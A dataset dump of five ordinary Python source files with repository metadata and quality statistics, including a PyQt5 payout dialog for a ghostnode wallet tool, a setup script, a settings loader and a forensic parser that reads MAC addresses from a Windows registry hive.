hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2594fb6de6dffcce3372d066529fcf8255ec3b49 | 573 | py | Python | regulation/settings.py | cfpb/regulations-xml-parser | e3bcbd9025f6fb6fa9ef2671fb8ed061c8de3e88 | [
"CC0-1.0"
] | 4 | 2016-01-02T21:04:42.000Z | 2019-08-17T06:30:36.000Z | regulation/settings.py | DalavanCloud/regulations-xml-parser | e3bcbd9025f6fb6fa9ef2671fb8ed061c8de3e88 | [
"CC0-1.0"
] | 49 | 2016-01-25T15:19:04.000Z | 2017-12-06T20:02:09.000Z | regulation/settings.py | DalavanCloud/regulations-xml-parser | e3bcbd9025f6fb6fa9ef2671fb8ed061c8de3e88 | [
"CC0-1.0"
] | 9 | 2016-01-21T19:25:30.000Z | 2021-02-20T10:53:47.000Z | #!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
import importlib
import os
import sys
# Try to load the settings module
try:
local_settings = importlib.import_module(
os.environ.get('REGML_SETTINGS_FILE', 'settings'))
globals().update(local_settings.__dict__)
except ImportError:
logger.error("Unable to import settings module. "
"Please double-check your REGML_SETTINGS_FILE "
"environment variable")
sys.exit(1)
globals().update(local_settings.__dict__)
| 27.285714 | 64 | 0.722513 | 70 | 573 | 5.542857 | 0.585714 | 0.100515 | 0.082474 | 0.134021 | 0.154639 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002169 | 0.195462 | 573 | 20 | 65 | 28.65 | 0.839479 | 0.09075 | 0 | 0.133333 | 0 | 0 | 0.242775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.533333 | 0 | 0.533333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
2596f72f06a517f88b80e5187a646537bcd3ae06 | 16,968 | py | Python | src/ui/ui_send_payout_dlg.py | muteio/ghostnode-tool | c42868ed6c009c47482d23ebac0d101adbd8c103 | [
"MIT"
] | 1 | 2019-11-02T01:39:52.000Z | 2019-11-02T01:39:52.000Z | src/ui/ui_send_payout_dlg.py | NixPlatform/ghostnode-tool | c42868ed6c009c47482d23ebac0d101adbd8c103 | [
"MIT"
] | null | null | null | src/ui/ui_send_payout_dlg.py | NixPlatform/ghostnode-tool | c42868ed6c009c47482d23ebac0d101adbd8c103 | [
"MIT"
] | 1 | 2019-09-21T15:08:36.000Z | 2019-09-21T15:08:36.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_send_payout_dlg.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_SendPayoutDlg(object):
def setupUi(self, SendPayoutDlg):
SendPayoutDlg.setObjectName("SendPayoutDlg")
SendPayoutDlg.resize(832, 507)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(SendPayoutDlg.sizePolicy().hasHeightForWidth())
SendPayoutDlg.setSizePolicy(sizePolicy)
SendPayoutDlg.setSizeGripEnabled(True)
SendPayoutDlg.setModal(True)
self.verticalLayout = QtWidgets.QVBoxLayout(SendPayoutDlg)
self.verticalLayout.setObjectName("verticalLayout")
self.pnl_input = QtWidgets.QWidget(SendPayoutDlg)
self.pnl_input.setObjectName("pnl_input")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.pnl_input)
self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lay_input = QtWidgets.QHBoxLayout()
self.lay_input.setSpacing(8)
self.lay_input.setObjectName("lay_input")
self.label_3 = QtWidgets.QLabel(self.pnl_input)
self.label_3.setObjectName("label_3")
self.lay_input.addWidget(self.label_3)
self.cbo_address_source_mode = QtWidgets.QComboBox(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbo_address_source_mode.sizePolicy().hasHeightForWidth())
self.cbo_address_source_mode.setSizePolicy(sizePolicy)
self.cbo_address_source_mode.setMinimumSize(QtCore.QSize(0, 0))
self.cbo_address_source_mode.setMaximumSize(QtCore.QSize(160, 16777215))
self.cbo_address_source_mode.setObjectName("cbo_address_source_mode")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.lay_input.addWidget(self.cbo_address_source_mode)
self.sw_address_source = QtWidgets.QStackedWidget(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.sw_address_source.sizePolicy().hasHeightForWidth())
self.sw_address_source.setSizePolicy(sizePolicy)
self.sw_address_source.setObjectName("sw_address_source")
self.wdg_address_source_1 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_1.sizePolicy().hasHeightForWidth())
self.wdg_address_source_1.setSizePolicy(sizePolicy)
self.wdg_address_source_1.setObjectName("wdg_address_source_1")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.wdg_address_source_1)
self.horizontalLayout_6.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_6.setSpacing(1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.lbl_account = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_account.setObjectName("lbl_account")
self.horizontalLayout_6.addWidget(self.lbl_account)
self.cbo_hw_account_nr = QtWidgets.QComboBox(self.wdg_address_source_1)
self.cbo_hw_account_nr.setObjectName("cbo_hw_account_nr")
self.horizontalLayout_6.addWidget(self.cbo_hw_account_nr)
self.btn_add_hw_account_nr = QtWidgets.QToolButton(self.wdg_address_source_1)
self.btn_add_hw_account_nr.setObjectName("btn_add_hw_account_nr")
self.horizontalLayout_6.addWidget(self.btn_add_hw_account_nr)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.lbl_hw_account_base_path = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_hw_account_base_path.setObjectName("lbl_hw_account_base_path")
self.horizontalLayout_6.addWidget(self.lbl_hw_account_base_path)
self.sw_address_source.addWidget(self.wdg_address_source_1)
self.wdg_address_source_2 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_2.sizePolicy().hasHeightForWidth())
self.wdg_address_source_2.setSizePolicy(sizePolicy)
self.wdg_address_source_2.setObjectName("wdg_address_source_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.wdg_address_source_2)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.lblSourceBip32Path = QtWidgets.QLabel(self.wdg_address_source_2)
self.lblSourceBip32Path.setObjectName("lblSourceBip32Path")
self.horizontalLayout_2.addWidget(self.lblSourceBip32Path)
self.edt_src_bip32_path = QtWidgets.QLineEdit(self.wdg_address_source_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.edt_src_bip32_path.sizePolicy().hasHeightForWidth())
self.edt_src_bip32_path.setSizePolicy(sizePolicy)
self.edt_src_bip32_path.setMaximumSize(QtCore.QSize(100, 16777215))
self.edt_src_bip32_path.setStyleSheet("background-color: lightgray;")
self.edt_src_bip32_path.setReadOnly(True)
self.edt_src_bip32_path.setObjectName("edt_src_bip32_path")
self.horizontalLayout_2.addWidget(self.edt_src_bip32_path)
self.btn_src_bip32_path = QtWidgets.QToolButton(self.wdg_address_source_2)
self.btn_src_bip32_path.setObjectName("btn_src_bip32_path")
self.horizontalLayout_2.addWidget(self.btn_src_bip32_path)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.sw_address_source.addWidget(self.wdg_address_source_2)
self.wdg_address_source_3 = QtWidgets.QWidget()
self.wdg_address_source_3.setObjectName("wdg_address_source_3")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.wdg_address_source_3)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.lbl_src_masternode = QtWidgets.QLabel(self.wdg_address_source_3)
self.lbl_src_masternode.setObjectName("lbl_src_masternode")
self.horizontalLayout.addWidget(self.lbl_src_masternode)
self.cbo_src_masternodes = QtWidgets.QComboBox(self.wdg_address_source_3)
self.cbo_src_masternodes.setObjectName("cbo_src_masternodes")
self.horizontalLayout.addWidget(self.cbo_src_masternodes)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem2)
self.sw_address_source.addWidget(self.wdg_address_source_3)
self.lay_input.addWidget(self.sw_address_source)
self.btnLoadTransactions = QtWidgets.QPushButton(self.pnl_input)
self.btnLoadTransactions.setAutoDefault(False)
self.btnLoadTransactions.setObjectName("btnLoadTransactions")
self.lay_input.addWidget(self.btnLoadTransactions)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.lay_input.addItem(spacerItem3)
self.verticalLayout_4.addLayout(self.lay_input)
self.verticalLayout.addWidget(self.pnl_input)
self.splitter = QtWidgets.QSplitter(SendPayoutDlg)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.main_widget = QtWidgets.QWidget(self.splitter)
self.main_widget.setObjectName("main_widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.main_widget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.lbl_message_2 = QtWidgets.QLabel(self.main_widget)
self.lbl_message_2.setText("")
self.lbl_message_2.setOpenExternalLinks(True)
self.lbl_message_2.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message_2.setObjectName("lbl_message_2")
self.verticalLayout_2.addWidget(self.lbl_message_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, 8, -1, -1)
self.horizontalLayout_4.setSpacing(6)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.btnCheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnCheckAll.setToolTip("")
self.btnCheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnCheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnCheckAll.setObjectName("btnCheckAll")
self.horizontalLayout_4.addWidget(self.btnCheckAll)
self.btnUncheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnUncheckAll.setToolTip("")
self.btnUncheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnUncheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnUncheckAll.setObjectName("btnUncheckAll")
self.horizontalLayout_4.addWidget(self.btnUncheckAll)
self.chbHideCollateralTx = QtWidgets.QCheckBox(self.main_widget)
self.chbHideCollateralTx.setStyleSheet("")
self.chbHideCollateralTx.setObjectName("chbHideCollateralTx")
self.horizontalLayout_4.addWidget(self.chbHideCollateralTx)
self.lbl_message = QtWidgets.QLabel(self.main_widget)
self.lbl_message.setStyleSheet("margin-left:20px;\n"
"font-size:11px;\n"
"background-color: rgb(56, 181, 255);\n"
"color: rgb(255, 255, 255);")
self.lbl_message.setWordWrap(False)
self.lbl_message.setOpenExternalLinks(True)
self.lbl_message.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message.setObjectName("lbl_message")
self.horizontalLayout_4.addWidget(self.lbl_message)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem4)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.tableView = QtWidgets.QTableView(self.main_widget)
self.tableView.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContentsOnFirstShow)
self.tableView.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tableView.setShowGrid(True)
self.tableView.setSortingEnabled(False)
self.tableView.setObjectName("tableView")
self.tableView.verticalHeader().setVisible(False)
self.tableView.verticalHeader().setCascadingSectionResizes(True)
self.tableView.verticalHeader().setHighlightSections(False)
self.verticalLayout_2.addWidget(self.tableView)
self.dest_widget1 = QtWidgets.QWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dest_widget1.sizePolicy().hasHeightForWidth())
self.dest_widget1.setSizePolicy(sizePolicy)
self.dest_widget1.setObjectName("dest_widget1")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.dest_widget1)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.dest_widget = QtWidgets.QFrame(self.dest_widget1)
self.dest_widget.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.dest_widget.setObjectName("dest_widget")
self.verticalLayout_3.addWidget(self.dest_widget)
self.verticalLayout.addWidget(self.splitter)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem5)
self.btnSend = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnSend.sizePolicy().hasHeightForWidth())
self.btnSend.setSizePolicy(sizePolicy)
self.btnSend.setMinimumSize(QtCore.QSize(200, 0))
self.btnSend.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnSend.setAutoDefault(False)
self.btnSend.setObjectName("btnSend")
self.horizontalLayout_3.addWidget(self.btnSend)
spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem6)
self.btnClose = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClose.sizePolicy().hasHeightForWidth())
self.btnClose.setSizePolicy(sizePolicy)
self.btnClose.setMinimumSize(QtCore.QSize(0, 0))
self.btnClose.setLayoutDirection(QtCore.Qt.LeftToRight)
self.btnClose.setAutoDefault(False)
self.btnClose.setObjectName("btnClose")
self.horizontalLayout_3.addWidget(self.btnClose, 0, QtCore.Qt.AlignRight)
self.verticalLayout.addLayout(self.horizontalLayout_3)
self.retranslateUi(SendPayoutDlg)
self.sw_address_source.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(SendPayoutDlg)
def retranslateUi(self, SendPayoutDlg):
_translate = QtCore.QCoreApplication.translate
SendPayoutDlg.setWindowTitle(_translate("SendPayoutDlg", "Dialog"))
self.label_3.setText(_translate("SendPayoutDlg", "View as"))
self.cbo_address_source_mode.setItemText(0, _translate("SendPayoutDlg", "Wallet Account"))
self.cbo_address_source_mode.setItemText(1, _translate("SendPayoutDlg", "BIP32 Path"))
self.cbo_address_source_mode.setItemText(2, _translate("SendPayoutDlg", "Ghostnode Address"))
self.lbl_account.setText(_translate("SendPayoutDlg", "Account "))
self.btn_add_hw_account_nr.setToolTip(_translate("SendPayoutDlg", "Add new account number"))
self.btn_add_hw_account_nr.setText(_translate("SendPayoutDlg", "."))
self.lbl_hw_account_base_path.setText(_translate("SendPayoutDlg", "..."))
self.lblSourceBip32Path.setText(_translate("SendPayoutDlg", "BIP32 path"))
self.btn_src_bip32_path.setToolTip(_translate("SendPayoutDlg", "Change BIP32 path"))
self.btn_src_bip32_path.setText(_translate("SendPayoutDlg", "..."))
self.lbl_src_masternode.setText(_translate("SendPayoutDlg", "Ghostnode"))
self.btnLoadTransactions.setText(_translate("SendPayoutDlg", "Reload"))
self.btnCheckAll.setText(_translate("SendPayoutDlg", "Select All"))
self.btnUncheckAll.setText(_translate("SendPayoutDlg", "Unselect All"))
self.chbHideCollateralTx.setText(_translate("SendPayoutDlg", "Hide collateral utxos"))
self.lbl_message.setText(_translate("SendPayoutDlg", "...."))
self.btnSend.setText(_translate("SendPayoutDlg", "Prepare Transaction"))
self.btnClose.setText(_translate("SendPayoutDlg", "Close"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
SendPayoutDlg = QtWidgets.QDialog()
ui = Ui_SendPayoutDlg()
ui.setupUi(SendPayoutDlg)
SendPayoutDlg.show()
sys.exit(app.exec_())
| 61.701818 | 116 | 0.753713 | 1,774 | 16,968 | 6.966742 | 0.125141 | 0.054697 | 0.036249 | 0.040456 | 0.503843 | 0.395582 | 0.295089 | 0.256008 | 0.200987 | 0.160288 | 0 | 0.022664 | 0.149694 | 16,968 | 274 | 117 | 61.927007 | 0.833934 | 0.011256 | 0 | 0.096154 | 1 | 0 | 0.071859 | 0.004055 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007692 | false | 0 | 0.007692 | 0 | 0.019231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2597942237584a092a777b8ebc52564660ff2499 | 251 | py | Python | evo_mwc/__init__.py | mrazomej/evo_mwc | b69c800c5518d906cd2c65334c6feffdbab5acf1 | [
"MIT"
] | null | null | null | evo_mwc/__init__.py | mrazomej/evo_mwc | b69c800c5518d906cd2c65334c6feffdbab5acf1 | [
"MIT"
] | 2 | 2020-06-01T22:36:08.000Z | 2020-07-01T23:32:06.000Z | evo_mwc/__init__.py | mrazomej/evo_mwc | b69c800c5518d906cd2c65334c6feffdbab5acf1 | [
"MIT"
] | 1 | 2019-07-09T21:18:52.000Z | 2019-07-09T21:18:52.000Z | # -*- coding: utf-8 -*-
"""Top level package for evo_utils utilities"""
from . import viz
from . import fitderiv
from . import model
__author__ = """Manuel Razo"""
__email__ = """mrazomej {at} caltech.edu"""
__version__ = '0.0.1'
name = 'evo_mwc'
| 17.928571 | 47 | 0.661355 | 34 | 251 | 4.470588 | 0.823529 | 0.197368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019139 | 0.167331 | 251 | 13 | 48 | 19.307692 | 0.708134 | 0.25498 | 0 | 0 | 0 | 0 | 0.265193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
259eedab428d052f5de5cef2f33e8a5144b57d54 | 1,180 | py | Python | setup.py | transientlunatic/gravitic | 3f818b5b52dafd8db0cef8f7da930996c84125be | [
"BSD-3-Clause"
] | 2 | 2021-04-12T10:38:58.000Z | 2021-04-12T13:53:16.000Z | setup.py | transientlunatic/gravitic | 3f818b5b52dafd8db0cef8f7da930996c84125be | [
"BSD-3-Clause"
] | null | null | null | setup.py | transientlunatic/gravitic | 3f818b5b52dafd8db0cef8f7da930996c84125be | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
# with open('README.rst') as readme_file:
# readme = readme_file.read()
# with open('HISTORY.rst') as history_file:
# history = history_file.read()
with open("requirements.txt") as requires_file:
requirements = requires_file.read().split("\n")
requirements = [requirement for requirement in requirements if not ("+" in requirement)]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='gravitic',
use_scm_version=True,
setup_requires=['setuptools_scm'],
description="""An abstract gravitational wave pipeline constructor.""",
#long_description=readme + '\n\n' + history,
author="Daniel Williams",
author_email='daniel.williams@ligo.org',
url='https://github.com/transientlunatic/gravitic',
packages=['gravitic'],
package_dir={'gravitic': 'gravitic'},
entry_points={
'console_scripts': [
'gravitic=gravitic.cli:gravitic'
]
},
include_package_data=True,
# install_requires=requirements,
zip_safe=True,
# keywords='supervisor, pe, ligo, asimov',
test_suite='tests',
tests_require=test_requirements,
)
| 28.780488 | 88 | 0.683051 | 132 | 1,180 | 5.931818 | 0.537879 | 0.030651 | 0.030651 | 0.040868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184746 | 1,180 | 40 | 89 | 29.5 | 0.813929 | 0.25678 | 0 | 0 | 0 | 0 | 0.288018 | 0.062212 | 0 | 0 | 0 | 0.025 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25ae6c1ba93e797d3822a5f53bd87f019d8ffea6 | 1,420 | py | Python | modules/Registry/lv1_os_win_reg_mac_address.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | [
"Apache-2.0"
] | null | null | null | modules/Registry/lv1_os_win_reg_mac_address.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | [
"Apache-2.0"
] | null | null | null | modules/Registry/lv1_os_win_reg_mac_address.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | [
"Apache-2.0"
] | null | null | null |
class Mac_Address_Information:
par_id = ''
case_id = ''
evd_id = ''
mac_address = ''
description = ''
backup_flag = ''
source_location = []
def MACADDRESS(reg_system):
mac_address_list = []
mac_address_count = 0
reg_key = reg_system.find_key(r"ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}")
for reg_subkey in reg_key.subkeys():
try:
for reg_subkey_value in reg_subkey.values():
if reg_subkey_value.name() == 'DeviceInstanceID':
if 'FFFF' in reg_subkey_value.data():
mac_address_information = Mac_Address_Information()
mac_address_list.append(mac_address_information)
mac_address_list[mac_address_count].source_location = []
mac_address_list[mac_address_count].source_location.append('SYSTEM-ControlSet001/Control/Class/{4d36e972-e325-11ce-bfc1-08002be10318}')
mac_address_list[mac_address_count].mac_address = reg_subkey_value.data().split('\\')[-1][0:6] + reg_subkey_value.data().split('\\')[-1][10:16]
mac_address_list[mac_address_count].description = reg_subkey.value(name='DriverDesc').data()
mac_address_count = mac_address_count + 1
except:
print('-----MAC Address Error')
